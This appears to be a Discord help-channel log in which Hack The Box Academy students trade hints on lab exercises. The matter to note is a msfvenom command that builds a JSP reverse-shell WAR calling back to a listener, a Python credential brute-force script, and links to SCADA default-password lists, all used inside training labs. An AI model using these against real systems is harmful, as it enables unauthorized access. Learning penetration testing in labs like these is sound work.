I would love some help with the second question on this module
I managed to decode the remember me cookie
But i cant encode it after editing it help please

Is that not a Rule break?

Well I looked at the page of https://academy.hackthebox.com/module/80/section/772 but the csv about ||Scada|| is strange...I mean we have not something like ftp-betterdefaultcredentials.txt in default-credentials of seclists, does there is a link to download the valid one to have username:password?

Not just you, I have the exact same problem!

two people having the same issue? hmmm 🤨

I am having an issue with the Password attack Lab Hard , I am using Hydra to brute force the RDP with the given Username , But I get different Passwords from Hydra Each time and none of them is working with xfreerdp.
Any help would be appreciated

hello guys im new here maybe my english not that good, i just wanna know do anyone have reccomendation which modules should i learn to learn as red team android?

is it the login brute force module?

nvm

found it i was blind

Yep , The Hard Lab

use crackmapexec instead of hydra

Tried it with no luck , Used the mutated pass list with the custom rule and still

with the pwnbox, I cannot transfer lsass.dmp using the suggested method too

Someone please... https://academy.hackthebox.com/module/80/section/772

Hello Everyone,
I'm doing the IDS/IPS module
https://academy.hackthebox.com/module/226/section/2416

Currently stuck in one single problem, on Snort Rule Development I'm tasked with with finding the keyword needed.
I've found the keyword to get the packets alert, but the same keyword is not the answer for the question in the academy.
Anyone able to help?

I posted it in the forum, in an already open thread in the same topic

hi how can i start

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

OMG! You got #r00t!
No, I'm just kidding 🙂

You have been blocked bacause you tried to do something funny to our platform.

??

🤷

??

maybe try a different browser ¯_(ツ)_/¯

Or disable adblock or other third party software

its not worked

its not wotked too

Someone please :/ 😭.

is there anyway to access port 22 on a mobile network? i cant complete the ssh module it no response on port 22 when i connect at home i have no problems

sorry bro i never done that module T-T wish i can help ya

some one help me please

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Message support

Sounds like your ip got flagged somehow (probably mistake)

do you mean me marcielee

I mean @odd eagle since they're having issues accessing the site altogether

oh ok

No idea what your issue is.

Mobile you'd have to connect to the vpn to access the sites

And even then doing any interaction on mobile is nails on a chalkboard

k ill try again im using the openvpn they give you

But again, I'd just wait until you're at a computer to do it

im in the pc

Not you

Only thing i can say is message/email support and try and resolve the issue

Module: Footprinting - Lab Hard:
Task:
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.

That is indeed the task

Reading the engagement carefully will help you understand where to look

So i am on flag4.txt question on the Linux Privilege Escalation Skill Assessment and Idk if I am trying to do the wrong thing here but I have the admin credentials for the Tomcat Manager and I have tried using msfconsole with that information along with setting my own payload with msfvenom to get a reverse shell into it to find the flag4.txt. i have tried multi/http/tomcat_mgr_upload and entered in all of the options and it keeps saying : Exploit aborted due to failure: unknown: Failed to execute Payload. And when I upload the war file I cannot get a connection back from the upload on my listener. Some help would be appreciated if possible.

you are prolly using the wrong msfvenom payload

^

@topaz zenith What I understand is that I have to find the credentials to access the POP3S service, am I correct?

You @ the wrong person

But enumerate ports udp and tcp

msfvenom -p java/jsp_shell_reverse_tcp LHOST= 10.10.15.43 LPORT=4321 -f war -o rshell.war

Looks like you have a space after LHOST=

XD

@fathom pendant I've got the ports in sight
22
995
993
110
143

There's more

That's only tcp

look at the help menu for nmap to see what flag to scan for udp if u dont know

wow thank you

If someone c an 😭 : #1227666293902282782 message

Looks like [-] means bad and [+] means good

"I will then perform a more thorough scan to see what I can find and thus be able to find something." @fathom pendant

Also think about what services you may not have interacted with yet

I spent way too long on this on my first go though because I just didn't read

A handful of keywords actually clear a bunch up as to what to look for

???

It's not answering to my problem 😭.

Meaning the output of the program

I know.

You can likely filter with grep or something

Maybe you missed it

But I can save it into a file.

I have no file at the end.

That's a whole other issue

But grep you can just do from the cli

command | grep "string"

Escape [ and ]

^

[ and ] are special characters

It's also likely it's treating + as a special character

Try "\[\+\]"

Gotta learn how to escape chars brother

\I have already used it and still "blue" lol, dw I know.

Also looks like the error is within the python program

It runs fine without the grep yeah?

import sys
import requests
import os.path

url = "xxx"
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"}
messageOnValidation = "Welcome"

def unpack(fline):
    column = fline.split(",")[2]
    Username = column.split(":")[-1].strip()
    Password = column.split(":")[0].strip()
    return Username, Password

def do_req(url, Username, Password, headers):
    data = {"Username": Username, "Password": Password, "submit": "submit"}
    res = requests.post(url, headers=headers, data=data)
    return res.text

def check(haystack, needle):
    if needle in haystack:
        return True
    else:
        return False

def main():
    if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])):
        fileName = sys.argv[1]
    else:
        print("[!] Please check wordlist.")
        print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0]))
        sys.exit()
    with open(fileName) as fh:
        for fline in fh:
            if fline.startswith("#"):
                continue
            Username, Password = unpack(fline.rstrip())
            print("[-] Checking account {} {}".format(Username, Password))
            res = do_req(url, Username, Password, headers)
            if (check(res, messageOnValidation)):
                print("[+] Valid account found: Username:{} Password:{}".format(Username, Password))

if __name__ == "__main__":
    main()

Brother I'm not reading that

Hmm

??

Not mine, just edited unpack to have something working with scada.

Come from the course lol.

You want to grep only valid account ? But the regex with grep dosn't work ?

?

It does not matter if I use grep or no...

Adding the grep seems to break the python script

There is a file at the ennd only if there is one account.

what do you want to do exactly please ?

https://academy.hackthebox.com/module/80/section/772

What is the valid username.

Is the welcome message "Welcome!"

They give us this script : https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_py.txt

Also how are you grabbing the message

It's for valid, not invalid.

Valid we have no info.

Invalid is : "Invalid credentials."

I can maybe edit to have not invalid.

did you try to grep only "Valid account found" ?

Also your script looks different from the provided one

Or it is grepping in itself that broke your chain ?

It's normal.

And is missing the contextual remarks

yeah he said he modified it but not so much

Looks at the scada.csv.

To let us know what it's doing

default script : https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_py.txt

"Our php examples use userid and passwd

It works only for a csv with this for example :

Yeah and I edited.

what you can do is in all the print command except the valid one you add file=sys.stderr

so you can pip 2>/dev/null all the wrong answer and keep only the valid one

??

print("[-] Checking account {} {}".format(Username, Password), file=sys.stderr)

This is sending "username" and "Password"

data = {"Username": Username, "Password": Password, "submit": "submit"}

Not userid and passwd

Where do you see "username"?

In your code

???

????

Literally this??

userid is an ex for their php page, not this one.

In this case, it's Username and Password.

Then further clarify that it's not for the example you're doing dude

Just throwing the raw code at us doesn't help

I quoted the question and gave the link but nvm...

I don't have that module unlocked

Well tell me xd, dw :).

And just linking the page doesn't help us understand your problem

.

"Inspect the login page and perform a bruteforce attack. What is the valid username?"

Look at the page title, and find the relevant list.

The title is speaking about scada.

BUT, the csv stored in the seclists repo is not like the which one I show you before as example :

^

So, the script given is wrong because it's taking 1st & 2nd column, but in scada.csv, it's the third and in the same column.

Did you check if there's a resources button?

So it's give us this function because only this one should be edited, but we have to replace parameters name and url:

def unpack(fline):
    column = fline.split(",")[2]
    userid = column.split(":")[-1].strip()
    passwd = column.split(":")[0].strip()
    return userid, passwd

the module seems hella fun to try LOL

And nothing :

I just edited a last thing : the message because I don't know the valid message when we are connected :

https://gchq.github.io/CyberChef/
https://github.com/s0md3v/Decodify

Are you exactly sure that it wants scada login

"Look at the page title, and find the relevant list." :

What I do now 😭 🥺 ?

well the seclist csv is wrong

but also https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv found a few HMI/SCADA related passwords here

http://scadasecuritybootcamp.com/SCADA-Default-Password-List.php here's just a list and you can ctrl+f for it

... They are giving us a script bro 🤣.

mmh?

Yeah a list, and what are talking about? CSV wow 🤣.

a
b
c
d
e
etc.

Is a list.

I am stuck on the same one I have the UsnJrnl file .csv

Does someone have a hint do I look at the cvs file or somewhere else?

you can use the entry numbers to correlate file creation